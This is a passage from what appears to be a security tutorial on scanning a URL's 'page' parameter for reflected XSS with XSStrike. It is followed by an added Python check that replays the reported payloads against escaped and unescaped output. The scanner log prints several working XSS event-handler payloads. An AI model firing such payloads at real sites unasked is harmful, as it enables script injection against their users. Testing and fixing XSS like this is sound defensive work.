Once all of this is done, we can use the tool, so we copy a URL that we believe may be vulnerable to XSS and pass it to the tool as follows:
sudo python3 xsstrike.py -u "URL_Vuln" --timeout 50
Info:
XSStrike v3.1.5
/home/dise0/Desktop/XSStrike/core/dom.py:27: SyntaxWarning: invalid escape sequence '\$'
controlledVariables.add(re.search(r'[a-zA-Z$_][a-zA-Z0-9$_]+', part).group().replace('$', '\$'))
/home/dise0/Desktop/XSStrike/core/dom.py:36: SyntaxWarning: invalid escape sequence '\$'
controlledVariables.add(re.search(r'[a-zA-Z$_][a-zA-Z0-9$_]+', part).group().replace('$', '\$'))
[~] Checking for DOM vulnerabilities
[+] Potentially vulnerable objects found
------------------------------------------------------------
------------------------------------------------------------ailed-td").innerHTML=lMessage;
[+] WAF Status: Offline
[!] Testing parameter: page
[!] Reflections found: 5
[~] Analysing reflections
[~] Generating payloads
[!] Payloads generated: 15456
------------------------------------------------------------
[+] Payload: <HTml%09oNmOusEovER%0a=%0a(prompt)``>
[!] Efficiency: 100
[!] Confidence: 10
[?] Would you like to continue scanning? [y/N] y
------------------------------------------------------------
[+] Payload: <a%09onmOUSEOVEr%0a=%0aconfirm()%0dx>v3dm0s
[!] Efficiency: 100
[!] Confidence: 10
[?] Would you like to continue scanning? [y/N] y
------------------------------------------------------------
[+] Payload: <a/+/ONPOiNteREnTEr%0a=%0aa=prompt,a()>v3dm0s
[!] Efficiency: 100
[!] Confidence: 10
[?] Would you like to continue scanning? [y/N] n
First, it tells us that the target is indeed vulnerable to XSS and that the specific parameter is page, so it generates a payload and asks whether we want to generate another one.
If we answer y, we can keep generating payloads, and for each one it reports the percentage chance that it will work plus its confidence.
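To confirm a fix for the reflected page parameter, the payloads the tool reported can be replayed as a regression check. This is an added example, not part of the original post or of XSStrike: it assumes the value is reflected in an HTML element body, and the template and function names are hypothetical.

```python
import html
from html.parser import HTMLParser
from urllib.parse import unquote_plus

# Payloads copied from the XSStrike output above (URL-encoded, as sent in `page`).
REPORTED_PAYLOADS = [
    "<HTml%09oNmOusEovER%0a=%0a(prompt)``>",
    "<a%09onmOUSEOVEr%0a=%0aconfirm()%0dx>v3dm0s",
    "<a/+/ONPOiNteREnTEr%0a=%0aa=prompt,a()>v3dm0s",
]

# Constructed template standing in for the page that reflects `page` (assumption).
TEMPLATE = "<div id='content'>Page: {value}</div>"


class HandlerFinder(HTMLParser):
    """Records every on* event-handler attribute that parses as real markup."""

    def __init__(self):
        super().__init__()
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.handlers += [(tag, name) for name, _ in attrs if name.startswith("on")]


def render_unsafe(page):
    """The 'before' behaviour: the parameter is reflected verbatim."""
    return TEMPLATE.format(value=page)


def render_escaped(page):
    """The fix: HTML-encode the value before placing it in element content."""
    return TEMPLATE.format(value=html.escape(page, quote=True))


def injected_handlers(markup):
    finder = HandlerFinder()
    finder.feed(markup)
    finder.close()
    return finder.handlers


def check(render):
    """Map each reported payload to the event handlers that survive rendering."""
    # unquote_plus mirrors query-string decoding on the server side.
    return {p: injected_handlers(render(unquote_plus(p))) for p in REPORTED_PAYLOADS}


if __name__ == "__main__":
    for name, render in (("unsafe", render_unsafe), ("escaped", render_escaped)):
        for payload, found in check(render).items():
            print(f"{name:8} {payload!r:55} -> {found}")
```

html.escape only covers the HTML body and quoted-attribute contexts; the innerHTML assignment flagged in the DOM check has to be fixed in the client-side script itself, for example by writing to textContent instead.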